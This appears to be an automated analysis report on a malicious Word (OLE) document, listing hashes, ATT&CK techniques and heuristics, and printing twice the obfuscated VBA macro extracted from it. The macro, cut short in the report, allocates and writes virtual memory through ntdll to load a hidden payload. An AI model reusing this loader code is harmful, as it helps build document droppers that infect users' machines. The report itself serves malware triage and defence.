Office (OLE) malware analysis — malicious · 469000a4992334fd

MALICIOUS

Office (OLE)

223.5 KB Created: 2017-11-09 12:44:00 Authoring application: Microsoft Office Word First seen: 2019-01-11

MD5: 58e69c70eebd7185286745772a2b3aca SHA-1: 74cc609b7f5bb94eb07d32a17f6983a601026250 SHA-256: 469000a4992334fdaed60ffb036b9d7c4ab7c326ed233d32142e460d4f4c36f0

62 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample is an OLE document with a large slack space anomaly and detected VBA macros. The VBA macro code uses PtrSafe declarations for functions like NtAllocateVirtualMemory and NtWriteVirtualMemory, indicating an attempt to manipulate memory, likely for executing a downloaded payload. The presence of these memory manipulation functions suggests a downloader or dropper functionality.

Heuristics 3

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 228,864 bytes but its declared streams total only 126,155 bytes — 102,709 bytes (45%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5149 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5149 bytes
SHA-256: `b0e241acff3f74ce19239ce70155217d9cb259fd4b58e6c51c6e9fb007a2357a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "mims" #If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then ' Es ist kalt und regungslos Public Declare Function bronchoscopic _ Lib "Ntdll " alias _ "NtAllocateVirtualMemory" (predict As Long, nonobservance As Long, ByVal drapery As Long, unpretentiouslyByVal As Long, abulic As Long, ByVal biauricular As Long) As Long ' And I can not resist ' Die Nacht Ã¶ffnet ihren SchoÃŸ Public Declare Function profluence Lib "Shlwapi.dll " alias "GetOverlappedResult" (ByVal besides As Any, aqualung As Any, gristle As Any, extragalactic As Any) As Long ' Stirb nicht ' Your love I can't dismiss #End If #If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then ' Stirb nicht ' Ich warte hier Public Declare PtrSafe Function adamantly _ Lib "ntdll " Alias _ "NtWriteVirtualMemory" (ByVal isometric As Any, ByVal magnetism As Any, ByVal dietetics As Any, ByVal rimless As Any, ByVal petroleuse As Any) As LongPtr ' Ich warte hier' I dont know who he is Public Declare PtrSafe Function mirage Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal semantically As Any, minimization As Any, guideless As Any, high As Any) As LongPtr ' Ich weiAY nicht wie du heiAYt Public Declare PtrSafe Function bronchoscopic _ Lib "ntdll " Alias _ "NtAllocateVirtualMemory" (pascit As LongPtr, diver As LongPtr, ByVal dairying As LongPtr, introjectedByVal As LongPtr, rile As LongPtr, ByVal attaboy As LongPtr) As LongPtr #End If ' Es ist kalt und regungslos ' With his hands around my neck Function dejaniras() backbiting.terrorist.Value = Day(#12/5/2013#) Set clumsily = backbiting.terrorist.SelectedItem coadjuvancy = 100 + 6 Pmt 0, coadjuvancy, 31224, 45683, 5 uncertainty = clumsily.Name aureole = 18 - 104 + 7930 baiza = Right(uncertainty, aureole) castoridae = modmin.procacity(baiza) venule = 70 + 4 Pmt 0, venule, 34638, 47355, 4 #If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then Dim opossum As LongPtr Dim palisade As LongPtr Dim agoraphobia As LongPtr Dim benumbed As LongPtr Dim peremptorily As LongPtr copula = 68 - 125 + 2121 #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim palisade As Long Dim opossum As Long Dim agoraphobia As Long gloxinia = 3 - 122 + 900 Dim benumbed As Long Dim peremptorily As Long copula = gloxinia + 3459 #End If hypothecate = 125 - 121 - 4 cunctando = 110 + 8 Pmt 0, cunctando, 25604, 19497, 7 adaptable = 10 + 9 Pmt 0, adaptable, 35678, 19550, 4 alphitomancy = castoridae opossum = faciles(alphitomancy) agoraphobia = 83 - 46 - 37 palisade = opossum + copula benumbed = 100 - 120 + 201547 peremptorily = 46 - 41 + 3495 dehydrated = vicious(benumbed, _ agoraphobia, _ palisade, agoraphobia, agoraphobia, agoraphobia, _ agoraphobia) heedful = 6 - 4 Pmt 0, heedful, 26431, 39038, 7 End Function Function faciles(opalescence) Dim dew As Long #If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then Dim sauce As Long Dim antic As LongPtr startlingly = 97 - 72 - 17 Dim miserly As LongPtr Dim anatomist As Integer Dim coachman As Long Dim heavendirected As LongPtr Dim cormorant As Long #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim antic As Long startlingly = 67 - 82 + 19 Dim miserly As Long Dim heavendirected As Long #End If aepyceros = VarPtr(antic) ivorybill = enormity(aepyceros, VarPtr(opalescence) + 8, startlingly) absolutism = 22 - 127 + 104 miserly = 53 - 25 - 28 hairlessness = 30 - 105 + 75 heavendirected = 36 - 20 + 9286 dew = 21 - 14 + 4089 telegram = 104 - 122 + 82 coceive = bronchoscopic(ByVal absolutism, _ miserly, ByVal hairlessness, heavendirected, ByVal dew, _ ByVal telegram) patriarchs = Fix(415) hypernym = gazingstock enormity miserly, antic, 96 - 3 + 5790 flammulina = 50 + 6 Pmt 0, flammulina, 6078, 19080, 3 faciles = miserly End Function Function enormity(habituated, grosgrain, gordian) #If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then Dim chuckwall ... (truncated)

SHA-256: b0e241acff3f74ce19239ce70155217d9cb259fd4b58e6c51c6e9fb007a2357a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "mims"
#If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
'  Es ist kalt und regungslos
Public Declare Function bronchoscopic _
Lib "Ntdll  " alias _
"NtAllocateVirtualMemory" (predict As Long, nonobservance As Long, ByVal drapery As Long, unpretentiouslyByVal As Long, abulic As Long, ByVal biauricular As Long) As Long
'  And I can not resist
'  Die Nacht Ã¶ffnet ihren SchoÃŸ
Public Declare Function profluence Lib "Shlwapi.dll  " alias "GetOverlappedResult" (ByVal besides As Any, aqualung As Any, gristle As Any, extragalactic As Any) As Long
'  Stirb nicht
'  Your love I can't dismiss
#End If
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
'  Stirb nicht
'  Ich warte hier
Public Declare PtrSafe Function adamantly _
Lib "ntdll   " Alias _
"NtWriteVirtualMemory" (ByVal isometric As Any, ByVal magnetism As Any, ByVal dietetics As Any, ByVal rimless As Any, ByVal petroleuse As Any) As LongPtr
'  Ich warte hier'  I dont know who he is
Public Declare PtrSafe Function mirage Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal semantically As Any, minimization As Any, guideless As Any, high As Any) As LongPtr
'  Ich weiAY nicht wie du heiAYt
Public Declare PtrSafe Function bronchoscopic _
Lib "ntdll   " Alias _
"NtAllocateVirtualMemory" (pascit As LongPtr, diver As LongPtr, ByVal dairying As LongPtr, introjectedByVal As LongPtr, rile As LongPtr, ByVal attaboy As LongPtr) As LongPtr

#End If
'  Es ist kalt und regungslos
'  With his hands around my neck

Function dejaniras()
backbiting.terrorist.Value = Day(#12/5/2013#)
Set clumsily = backbiting.terrorist.SelectedItem
coadjuvancy = 100 + 6
Pmt 0, coadjuvancy, 31224, 45683, 5
uncertainty = clumsily.Name
aureole = 18 - 104 + 7930
baiza = Right(uncertainty, aureole)
castoridae = modmin.procacity(baiza)
venule = 70 + 4
Pmt 0, venule, 34638, 47355, 4
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim opossum As LongPtr
Dim palisade As LongPtr
Dim agoraphobia As LongPtr
Dim benumbed As LongPtr
Dim peremptorily As LongPtr
copula = 68 - 125 + 2121
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim palisade As Long
Dim opossum As Long
Dim agoraphobia As Long
gloxinia = 3 - 122 + 900
Dim benumbed As Long
Dim peremptorily As Long
copula = gloxinia + 3459
#End If
hypothecate = 125 - 121 - 4
cunctando = 110 + 8
Pmt 0, cunctando, 25604, 19497, 7
adaptable = 10 + 9
Pmt 0, adaptable, 35678, 19550, 4
alphitomancy = castoridae
opossum = faciles(alphitomancy)
agoraphobia = 83 - 46 - 37
palisade = opossum + copula
benumbed = 100 - 120 + 201547
peremptorily = 46 - 41 + 3495
dehydrated = vicious(benumbed, _
agoraphobia, _
palisade, agoraphobia, agoraphobia, agoraphobia, _
agoraphobia)
heedful = 6 - 4
Pmt 0, heedful, 26431, 39038, 7
End Function


Function faciles(opalescence)
Dim dew As Long
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim sauce As Long
Dim antic As LongPtr
startlingly = 97 - 72 - 17
Dim miserly As LongPtr
Dim anatomist As Integer
Dim coachman As Long
Dim heavendirected As LongPtr
Dim cormorant As Long
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim antic As Long
startlingly = 67 - 82 + 19
Dim miserly As Long
Dim heavendirected As Long
#End If
aepyceros = VarPtr(antic)
ivorybill = enormity(aepyceros, VarPtr(opalescence) + 8, startlingly)
absolutism = 22 - 127 + 104
miserly = 53 - 25 - 28
hairlessness = 30 - 105 + 75
heavendirected = 36 - 20 + 9286
dew = 21 - 14 + 4089
telegram = 104 - 122 + 82
coceive = bronchoscopic(ByVal absolutism, _
miserly, ByVal hairlessness, heavendirected, ByVal dew, _
ByVal telegram)
patriarchs = Fix(415)
hypernym = gazingstock
enormity miserly, antic, 96 - 3 + 5790
flammulina = 50 + 6
Pmt 0, flammulina, 6078, 19080, 3
faciles = miserly
End Function

Function enormity(habituated, grosgrain, gordian)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then
Dim chuckwall
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.